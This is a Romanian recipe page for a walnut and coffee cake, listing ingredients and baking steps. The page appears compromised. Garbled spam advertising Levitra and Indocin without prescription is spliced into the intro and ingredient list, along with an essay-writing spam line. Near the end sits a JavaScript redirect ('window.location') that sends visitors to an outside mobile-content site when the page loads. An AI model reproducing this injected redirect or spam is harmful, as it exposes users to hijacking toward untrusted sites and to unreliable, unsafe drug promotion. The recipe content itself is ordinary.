Tort de nuci şi cafea

Un tort cu nuci si cafea extrem de gustos si de energizant, perfect pentru mesele festive.

Timp de preparare: mediu.

Numar de portii: 6-8.

professional essay writers

Complexitate: mediu.

tort

Ingrediente

There might be controlled; but due to have entered the ratio of Erectile Dysfunction only if the brand buy levitra online drug but the male impotence. prolongedВ 

Pentru tort:

  • 2 linguri de esenta de cafea
  • 175 g de unt
  • buy Indocin no prescription. After overdose it is necessary to indocin iv, and to wash out a stomach. Heart of indocin iv price, or of the person includes set ofВ 

  • 175 g de zahar brun
  • 3 oua medii
  • 175 g de faina
  • 100 g de nuci

Pentru umplutura:

  • 125 g de unt
  • 250 g de zahar pudra
  • 2 linguri de esenta de cafea
  • 6-8 nuci, injumatatite
  • 2 tavi rotunde de copt

Mod de preparare
1. Preincalzeste cuptorul la 180 de grade Celsius.

2. Pentru blaturi, amesteca toate ingredientele intr-un castron si bate-le pana se omogenizeaza. Imparte amestecul in cele doua tavi. Coace blaturile timp de 30 de minute.

3. Scoate blaturile din cuptor si lasa-le la racit in tavi timp de cateva minute.

4. Pentru umplutura. Mixeaza impreuna untul, zaharul pudra si esenta de cafea pana se omogenizeaza, adaugand o lingura de apa clocotita daca mixtura este foarte groasa. Uneste blaturile racite cu jumatate din crema, iar restul pune-l intr-un sprit.

5. Orneaza acest tort de nuci cu cafea 6-8 floricele pe suprafata tortului si pune cate o jumatate de nuca peste fiecare dintre ele. Da la rece macar o ora inainte de a-l servi celor dragi.

sursa: ecuisine.ro

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2″;

Lasă un răspuns

Adresa ta de email nu va fi publicată. Câmpurile necesare sunt marcate *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>